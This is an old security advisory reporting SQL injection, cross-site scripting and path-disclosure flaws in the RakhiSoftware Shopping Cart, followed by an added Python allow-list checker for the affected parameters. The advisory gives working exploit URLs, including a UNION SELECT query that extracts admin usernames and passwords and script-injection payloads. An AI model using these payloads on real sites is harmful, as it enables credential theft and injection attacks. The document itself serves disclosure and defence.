rakhi-sqlxssfpd.txt

29 Nov 2008 00:00:00 | Reported by Glafkos Charalambous | Type: packetstorm | Source: packetstormsecurity.com

RakhiSoftware Shopping Cart SQL, XSS, FPD Vulnerabilities


Code
`Application: RakhiSoftware Shopping Cart  
  
Vendor Name: RakhiSoftware  
  
Vendors Url: http://willscript.com/  
  
Bug Type: RakhiSoftware Shopping Cart (SQL,XSS,FPD) Multiple Vulnerabilities  
  
  
  
SQL category_id  
  
http://willscript.com/rjbike_new/product.php?category_id=1+union%20select%201,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20admin--&subcategory_id=1  
  
  
  
XSS category_id, subcategory_id  
  
http://willscript.com/rjbike_new/product.php?category_id=>'><script>alert(1949308870);</script>&subcategory_id=1  
  
http://willscript.com/rjbike_new/product.php?category_id=1&subcategory_id=>'><script>alert(1949308870);</script>  
  
  
  
Full Path Disclosure on every page  
  
Set Cookie: PHPSESSID='  
  
  
  
Credits:  
  
Charalambous Glafkos  
  
Email: glafkos (at) astalavista (dot) com  
  
___________________________________________  
  
ASTALAVISTA - the hacking & security community  
  
www.astalavista.com  
  
www.astalavista.net  
  
  
  
  
  
Best Regards,  
Charalambous Glafkos ( nowayout )  
`
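All three requests in the advisory place a non-conforming value in `category_id`, `subcategory_id` or the `PHPSESSID` cookie. The following is an added example, not part of the advisory or the vendor's code: an allow-list check for log triage or a front-end filter. The function names, the sample requests, the 128-character length bound, and the assumption that the path disclosure comes from the warning PHP raises for a session id with illegal characters are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two query parameters the advisory names; both should carry numeric ids.
ID_PARAMS = ("category_id", "subcategory_id")
POSITIVE_INT = re.compile(r"[1-9][0-9]{0,9}")
# Characters PHP's file-based session handler accepts in a session id.
# The length bound is an assumption of this example.
SESSION_ID = re.compile(r"[A-Za-z0-9,-]{1,128}")


def cookie_value(header, name):
    """Return the raw value of cookie `name` from a Cookie header, or None."""
    for part in header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def check_request(url, cookie_header=""):
    """List the allow-list violations in one request to the product page."""
    findings = []
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name in ID_PARAMS:
        # Every occurrence is checked, so a duplicated parameter cannot hide one.
        for value in query.get(name, []):
            if not POSITIVE_INT.fullmatch(value):
                findings.append(name)
    session_id = cookie_value(cookie_header, "PHPSESSID")
    if session_id is not None and not SESSION_ID.fullmatch(session_id):
        findings.append("PHPSESSID")
    return findings


# Constructed sample requests (shortened, not real traffic).
SAMPLES = [
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "PHPSESSID=abc123"),
    ("/rjbike_new/product.php?category_id=1+union+select+1&subcategory_id=1", ""),
    ("/rjbike_new/product.php?category_id=1&subcategory_id=%3Cb%3E", ""),
    ("/rjbike_new/product.php?category_id=1&subcategory_id=1", "PHPSESSID='"),
]

if __name__ == "__main__":
    for url, cookie in SAMPLES:
        print(check_request(url, cookie) or "ok", url)
```

The same rules belong in the application itself: cast both ids to integers before they reach the query or the page, and keep PHP warnings out of responses.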
